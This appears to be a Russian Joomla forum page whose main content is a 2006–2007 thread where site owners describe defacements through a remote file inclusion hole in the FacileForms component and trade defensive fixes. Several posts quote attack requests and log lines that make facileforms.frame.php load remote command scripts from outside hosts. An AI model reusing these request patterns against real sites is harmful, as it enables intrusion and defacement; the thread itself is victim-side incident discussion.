Новости Joomla

👩‍💻 События плагинов и порядок их срабатывания при работе с пользовательскими полями Joomla и использовании FieldsHelper.

👩‍💻 События плагинов и порядок их срабатывания при работе с пользовательскими полями Joomla и использовании FieldsHelper.

В процессе работы с Joomla бывает необходимо работать с пользовательским интерфейсом более тонко, чем обычно. Все формы Joomla состоят из стандартных полей, содержанием, стилем отображения, состоянием (включено/выключено, доступно для редактирования или нет и т.д.) можно управлять с помощью плагинов. Да и для нестандартных проектов хорошей практикой является создание одного системного или нескольких плагинов групп "под проект", в которых храниться весь "нестандарт".

В этой статье описаны все триггеры, которые вызываются через Event Dispatcher из administrator/components/com_fields/src/Helper/FieldsHelper.php, с привязкой к жизненному циклу (порядку этапов работы запроса), аргументам, изменяемым данным и дальнейшему распространению по Joomla. Это поможет вам работать с Joomla свободнее и не опасаясь при этом потерять изменения при очередном обновлении движка.

Подходы, описанные в статье, полезны в тех случаях, когда вы работаете с данными в com_fields - механизме создания и редактирования пользовательских полей ядра Joomla и при использовании FieldsHelper. Многие сторонние компоненты не используют эту возможность, поэтому данная статья будет полезна лишь частично.

Читать статью на Хабре.

@joomlafeed

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

Одна из самых популярных и старейших фото-галерей для Joomla получила новую версию.

👉 v.4.3.0. Что нового?
Панель управления для зарегистрированных пользователей. В этой версии появилась возможность каждому зарегистрированному пользователю управлять своими категориями и изображениями во фронтенде сайта.

Документация по новой функции.
Сайт проекта

@joomlafeed

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 19 Ответов
  • 10204 Просмотров
*

Murz

  • Новичок
  • 6
  • 2 / 0
Дефейснули 3 сайта через дыру в компоненте FacileForms 1.4.4
« : 19.09.2006, 18:14:15 »
C помощью дыры в компоненте FacileForms версии 1.4.4 у меня сегодня отдефейсили 3 сайта!
Хочу конешно выразить спасибо команде "cyber_error", которые произвели дефейс, что ничего не поломали, старый index.php аккуратно переименовали в old, но всё равно как-то не очень приятно ;)

Дыра, через которую дефейсили, находится в файле facileforms.frame.php, который запускал на исполнение скрипты:
http://www.acuariopeces.com/pnTemp/cmd.dat


Урл, через который всё это запускалось, выглядел так:
POST /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sv-sirzenich.de/images/c.jpg? HTTP/1.0

Ломануть получилось у них только через второй скрипт.

Причём, что интересно, ломанули не сам сайт, на котором был данный компонент, а соседние! По адресу находится скрипт, которому передаются команды и он умеет лазить по папкам и творить всякие другие интересные вещи...

Лечится либо удалением данного файла либо обновлением до новой версии. Так что всем, кто использует данный компонент, рекомендую в срочном порядке обновиться до новой версии и выпонить рекомендации, написанные на главной странице сайта http://facileforms.biz/
« Последнее редактирование: 19.09.2006, 18:18:04 от Murz »
Записан
*

Murz

  • Новичок
  • 6
  • 2 / 0
Re: Дефейснули 3 сайта через дыру в компоненте FacileForms 1.4.4
« Ответ #1 : 19.09.2006, 18:15:19 »
В Рунете вообще про то, что нашли дыру в FacileForms, тишина, вот поэтому и не получилось вовремя заклеить дырку пластырем ;)
Записан
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
Re: Дефейснули 3 сайта через дыру в компоненте FacileForms 1.4.4
« Ответ #2 : 19.09.2006, 18:18:33 »
в КАЖДОМ php-файле ДОЛЖНА в начале присутствовать строка
defined( '_VALID_MOS' ) or die( 'Restricted access' );
иначе совместно со включенным register globals эти взломы будут везде.
Записан
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: Дефейснули 3 сайта через дыру в компоненте FacileForms 1.4.4
« Ответ #3 : 19.09.2006, 18:44:04 »
Цитата: Murz от 19.09.2006, 18:15:19
В Рунете вообще про то, что нашли дыру в FacileForms, тишина, вот поэтому и не получилось вовремя заклеить дырку пластырем ;)
ну я бы не сказал, что совсем тишина... в частности, в новости про FacileForms 1.4.6с мы же писали, что разработчики устранили уязвимости и настоятельно рекомендуют обновиться... а вот на Secunia вроде сообщений об уязвимости не было, и в официальном списке уязвимых расширений на форуме Joomla данный компонент тоже не числится...
Записан
*

Murz

  • Новичок
  • 6
  • 2 / 0
Re: Дефейснули 3 сайта через дыру в компоненте FacileForms 1.4.4
« Ответ #4 : 21.09.2006, 12:30:32 »
Цитата: smart от 19.09.2006, 18:44:04
ну я бы не сказал, что совсем тишина... в частности, в новости про FacileForms 1.4.6с мы же писали, что разработчики устранили уязвимости и настоятельно рекомендуют обновиться...
Там в списке уязвимостей написано только про SQL injection, а не про то, что можно любой php-код на сайте выполнить.
Записан

Re: Дефейснули 3 сайта через дыру в компоненте FacileForms 1.4.4
« Ответ #5 : 15.03.2007, 23:47:16 »
Всем добрый вечер.
Всталкнулся с такой бедой , пытаються ломонуть мой сайт перед апом ya, с помощью 83.143.162.10 - - [15/Mar/2007:23:38:03 +0300] "GET /com_facileforms/facileforms.frame.php?ff_compath=http://www.yenzero.com/wp-admin/c.in?? HTTP/1.1" 200 25972

Пробовал банить по входящим Ip тоесть 83.143.162.10, не помогает пользуються проксями
проверил сайта www.yenzero.com не существует, просканил Nmapom выдает
Initiating SYN Stealth Scan against server1.wisd0m.net (216.12.200.18) [1672 ports] at 23:41
Discovered open port 80/tcp on 216.12.200.18
Discovered open port 21/tcp on 216.12.200.18
Discovered open port 25/tcp on 216.12.200.18
Discovered open port 443/tcp on 216.12.200.18
Discovered open port 22/tcp on 216.12.200.18
Discovered open port 110/tcp on 216.12.200.18
Discovered open port 3306/tcp on 216.12.200.18
Discovered open port 143/tcp on 216.12.200.18
Discovered open port 993/tcp on 216.12.200.18
Discovered open port 995/tcp on 216.12.200.18
The SYN Stealth Scan took 38.68s to scan 1672 total ports.
Host server1.wisd0m.net (216.12.200.18) appears to be up ... good.
Забанил

что посоветуете, стоит com_facileforms 1.4.7re
Записан
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: Дефейснули 3 сайта через дыру в компоненте FacileForms 1.4.4
« Ответ #6 : 16.03.2007, 00:06:58 »
Цитата: tolyan от 15.03.2007, 23:47:16
что посоветуете, стоит com_facileforms 1.4.7re
очень странно, эту дыру вроде ж давно закрыли... проверьте, что в начале файла /com_facileforms/facileforms.frame.php? есть строчка:

defined( '_VALID_MOS' ) or die( 'Restricted access' );
Записан

Re: Дефейснули 3 сайта через дыру в компоненте FacileForms 1.4.4
« Ответ #7 : 16.03.2007, 00:19:53 »
так нету у меня этого файла :o
Записан
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
Re: Дефейснули 3 сайта через дыру в компоненте
« Ответ #8 : 16.03.2007, 00:23:57 »
здесь
Цитата: tolyan от 15.03.2007, 23:47:16
83.143.162.10 - - [15/Mar/2007:23:38:03 +0300] "GET /com_facileforms/facileforms.frame.php?ff_compath=http://www.yenzero.com/wp-admin/c.in?? HTTP/1.1" 200 25972
написано обратное...
Записан
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3

Re: Дефейснули 3 сайта через дыру в компоненте FacileForms 1.4.4
« Ответ #9 : 16.03.2007, 00:26:47 »
Я сам раз десять проверил , в бекапах тоже , нет . в админ\сом_фацилаформ тоже нет ????
Записан

Re: Дефейснули 3 сайта через дыру в компоненте FacileForms 1.4.4
« Ответ #10 : 16.03.2007, 22:05:08 »
Люди помогите отловить гад*** , опять пытються дефейснуть????
172.174.45.39 - - [16/Mar/2007:21:59:35 +0300] "GET /components/com_facileforms/facileforms.frame.ph
p?ff_compath=http://www.grodmansskolan.se/cmd.txt?
Записан
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
Re: Дефейснули 3 сайта через дыру в компоненте
« Ответ #11 : 16.03.2007, 22:12:34 »
покажи конец строчки

зы. это логи случаем не с винроута?
Записан
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3

Re: Дефейснули 3 сайта через дыру в компоненте
« Ответ #12 : 16.03.2007, 22:20:09 »
172.174.45.39 - - [16/Mar/2007:21:59:35 +0300] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.grodmansskolan.se/cmd.txt? HTTP/1.1" 200 27650
 никому плохого не  делал, ни кого не обижал. Наверное жадные конкуренты , давяться что я в yandex топе


нет apache
Записан
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
Re: Дефейснули 3 сайта через дыру в компоненте
« Ответ #13 : 16.03.2007, 22:36:00 »
Цитата: tolyan от 16.03.2007, 22:20:09
200 27650
нифига не понимаю...
утвердительный ответ на запрос (200=ОК) и размер файла 27650 байт....
ну была отдача или я чего-то недопонимаю...

ps. очень рекомендую воспользоваться htaccess.txt (переименовать в .htaccess)
Записан
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3

Re: Дефейснули 3 сайта через дыру в компоненте
« Ответ #14 : 16.03.2007, 22:46:26 »
делаю запрос GET /components/com_facileforms/facileforms.frame.php ответ 404
 .htaccess есть, настроен от эксплойтов но видно слабо настроен:(
А определить того как определить откуда ?
адрес определил nmapom .grodmansskolan.se -  212.75.88.27 вчерашний 216.12.200.18

забанил
что делать дальше?
« Последнее редактирование: 16.03.2007, 22:50:21 от tolyan »
Записан
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
Re: Дефейснули 3 сайта через дыру в компоненте FacileForms 1.4.4
« Ответ #15 : 16.03.2007, 22:53:37 »
так какая сейчас у тебя версия фасили и джумлы?
htaccess от какой версии?
Записан
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3

Re: Дефейснули 3 сайта через дыру в компоненте FacileForms 1.4.4
« Ответ #16 : 16.03.2007, 22:55:24 »
Joomla последняя фацила 1.4.7 :o
Записан
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
Re: Дефейснули 3 сайта через дыру в компоненте FacileForms 1.4.4
« Ответ #17 : 16.03.2007, 23:03:01 »
1.
Цитата: tolyan от 16.03.2007, 22:20:09
172.174.45.39 - - [16/Mar/2007:21:59:35 +0300] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.grodmansskolan.se/cmd.txt? HTTP/1.1" 200 27650
2.
Цитата: tolyan от 16.03.2007, 22:46:26
делаю запрос GET /components/com_facileforms/facileforms.frame.php ответ 404

кто-то их вас двоих не прав :)
Записан
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3

Re: Дефейснули 3 сайта через дыру в компоненте FacileForms 1.4.4
« Ответ #18 : 16.03.2007, 23:53:53 »
да знаю, что протеворечят ответы, но сам не могу понять, почему
Записан
*

oppo

  • Захожу иногда
  • 365
  • 82 / 8
  • ΨΨΨ я - УКРАЇНЕЦЬ
Re: Дефейснули 3 сайта через дыру в компоненте FacileForms 1.4.4
« Ответ #19 : 17.03.2007, 00:48:24 »
вообще я считаю эти формы не нужны ..
что стоит написать модуль или бот с нужной формой сро всеми вкусностями кот. в данном случае нужны
Записан
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Можно ли автоматически выводить результаты заполненой анкеты на другую страницу сайта

Автор Veours

 Ответов: 1
Просмотров: 7828 		Последний ответ 18.04.2012, 01:24:14
от fragmarw
как перевести контактную форму созданную в FacileForms при помощи Joom!Fish?

Автор tierex

 Ответов: 6
Просмотров: 10055 		Последний ответ 18.01.2012, 10:24:19
от asav2011
FacileForms

Автор ps1panda

 Ответов: 0
Просмотров: 16103 		Последний ответ 12.12.2011, 14:10:55
от ps1panda
Ошибка после установки FacileForms 1.4.7 в Joomla 1.5.15

Автор tolian_27

 Ответов: 4
Просмотров: 9120 		Последний ответ 01.04.2011, 00:46:39
от Karry
Ошибка *** EXCEPTION CAUGHT BY FacileForms *** всплывает в новом окне

Автор azizovslava

 Ответов: 0
Просмотров: 7259 		Последний ответ 25.11.2010, 08:50:42
от azizovslava